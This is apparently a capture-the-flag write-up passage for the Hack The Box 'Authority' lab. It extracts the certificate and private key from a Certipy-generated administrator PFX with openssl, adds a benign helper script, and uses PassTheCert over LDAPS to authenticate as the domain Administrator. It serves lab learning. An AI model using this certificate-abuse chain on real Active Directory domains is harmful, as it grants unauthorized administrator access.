PFX Extraction
As previously pointed out, a lot can be done with a PFX (PKCS#12) file, since it bundles the end-entity certificate, optionally the intermediate certificates, and the matching private key. It is therefore straightforward to split a PFX into a separate certificate and private key pair, which is the form most LDAP client-certificate tooling expects.
(Pre-req) Unprotecting a PFX file (Not Needed)
┌──(kali㉿kali)-[~/…/htb/labs/authority/ADCS]
└─$ certipy cert -export -pfx administrator.pfx -password "" -out unprotected.administrator.pfx
Certipy v4.3.0 - by Oliver Lyak (ly4k)
[*] Writing PFX to 'unprotected.administrator.pfx'
Since the original PFX file (administrator.pfx) is not protected by any password at all, but was generated by Certipy with a valid domain credential, the export step shown above is unnecessary. It is only relevant when a recovered PFX does carry a password that has to be stripped first.
Private Key
┌──(kali㉿kali)-[~/…/labs/authority/ADCS/pfx]
└─$ openssl pkcs12 -in ../administrator.pfx -nocerts -out administrator.pri
enter import password:
enter pem pass phrase:qwe123
verifying - enter pem pass phrase:qwe123
Extracting the private key from the administrator.pfx file.
Since the PFX file was generated with no password, nothing is entered at the import password prompt.
openssl then prompts for a PEM pass phrase. This is normal: by default openssl pkcs12 -nocerts writes the extracted key encrypted, and the pass phrase must be at least four characters long. (A PEM key does not have to be encrypted to be usable; passing -nodes, or -noenc on OpenSSL 3, skips this step entirely.) I set it to qwe123.
┌──(kali㉿kali)-[~/…/labs/authority/ADCS/pfx]
└─$ openssl rsa -in administrator.pri -out administrator.pri.decrypted
enter pass phrase for administrator.pri:qwe123
writing RSA key
The result is a private key, but it is still encrypted with the pass phrase chosen during extraction (qwe123).
So it needs to be decrypted once more; openssl rsa writes the plaintext key to administrator.pri.decrypted.
Public Key
┌──(kali㉿kali)-[~/…/labs/authority/ADCS/pfx]
└─$ openssl pkcs12 -in ../administrator.pfx -clcerts -nokeys -out administrator.pub
Enter Import Password:
Extracting the certificate (which carries the public key) from the administrator.pfx file.
Since no private key is being written this time, there is no pass phrase prompt, unlike the private key step.
Only the import password is asked for, and it is again left empty since the PFX has none.
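As an added example (not part of the original writeup), the two extraction steps above can be scripted so that openssl never prompts, and the resulting certificate and key can be checked for consistency before they are handed to passthecert. The script builds its own throwaway self-signed certificate and password-less PFX so it runs offline; the file names test.pfx, cert.pem and key.pem, the CN and the work directory are assumptions. It also goes slightly beyond the page by accepting a non-empty import password for PFX files that do have one.

```shell
#!/bin/sh
# Added example, not code from the original writeup or from Certipy/PassTheCert.
# Non-interactive PFX extraction with openssl, plus a check that the extracted
# certificate and private key actually belong together.
# Assumptions: file names test.pfx / cert.pem / key.pem, CN=administrator.
set -eu

# Build a password-less PFX (the same shape Certipy writes) from a freshly
# generated RSA key and a self-signed certificate.  $1 = work dir.
make_test_pfx() {
    openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
        -subj "/CN=administrator" \
        -keyout "$1/orig.key" -out "$1/orig.crt" >/dev/null 2>&1
    # -passout pass:  -> empty export password, i.e. an "unprotected" PFX
    openssl pkcs12 -export -inkey "$1/orig.key" -in "$1/orig.crt" \
        -out "$1/test.pfx" -passout pass:
}

# Extract certificate and key without any interactive prompt.
# $1 = pfx file, $2 = import password ("" for none), $3 = output dir.
# -nodes (alias of -noenc on OpenSSL 3) writes the key unencrypted, so the
# second "openssl rsa" round-trip from the writeup is not needed.
pfx_extract() {
    openssl pkcs12 -in "$1" -passin "pass:$2" -clcerts -nokeys \
        -out "$3/cert.pem" 2>/dev/null
    openssl pkcs12 -in "$1" -passin "pass:$2" -nocerts -nodes \
        -out "$3/key.pem" 2>/dev/null
}

# Compare the SubjectPublicKeyInfo inside the certificate with the public
# half derived from the private key.  $1 = cert.pem, $2 = key.pem.
# Returns 0 when they match, 1 otherwise.
keys_match() {
    cert_pub=$(openssl x509 -in "$1" -pubkey -noout | openssl sha256)
    key_pub=$(openssl pkey -in "$2" -pubout 2>/dev/null | openssl sha256)
    [ "$cert_pub" = "$key_pub" ]
}

# Stand-alone demo on a temporary, constructed PFX.
demo() {
    d=$(mktemp -d)
    make_test_pfx "$d"
    pfx_extract "$d/test.pfx" "" "$d"
    if keys_match "$d/cert.pem" "$d/key.pem"; then
        echo "cert.pem and key.pem match; safe to use as a client certificate pair"
    else
        echo "cert.pem and key.pem do NOT match"
    fi
    rm -rf "$d"
}

demo
```

To apply it to a real file, call pfx_extract administrator.pfx "" . followed by keys_match cert.pem key.pem. A mismatch means the certificate and key came from different requests, and the TLS client-certificate handshake will fail before any LDAP whoami is possible, which is a much less obvious failure than a wrong import password.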
Validation
┌──(kali㉿kali)-[~/…/htb/labs/authority/ADCS]
└─$ git clone https://github.com/AlmondOffSec/PassTheCert.git
Cloning into 'PassTheCert'...
remote: Enumerating objects: 109, done.
remote: Counting objects: 100% (109/109), done.
remote: Compressing objects: 100% (75/75), done.
remote: Total 109 (delta 47), reused 83 (delta 33), pack-reused 0
receiving objects: 100% (109/109), 44.73 KiB | 2.98 MiB/s, done.
resolving deltas: 100% (47/47), done.
According to the author’s blog, PassTheCert is a simple C# tool that can authenticate to an LDAP server using a client certificate and perform actions that are interesting for an attacker. Unlike most other offensive tools, it has the added bonus of working in environments where LDAP Channel Binding is enabled, because Schannel authentication is, by design, not subject to Channel Binding. The repository also ships a Python port, which is what is used below over LDAPS (port 636).
┌──(kali㉿kali)-[~/…/labs/authority/ADCS/pfx]
└─$ python3 PassTheCert/Python/passthecert.py -action whoami -crt administrator.pub -key administrator.pri.decrypted -domain AUTHORITY.HTB -dc-ip $IP -port 636
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] you are logged in as: HTB\Administrator
Successfully validated: the extracted certificate and key authenticate as HTB\Administrator. Moving on to the Privilege Escalation phase.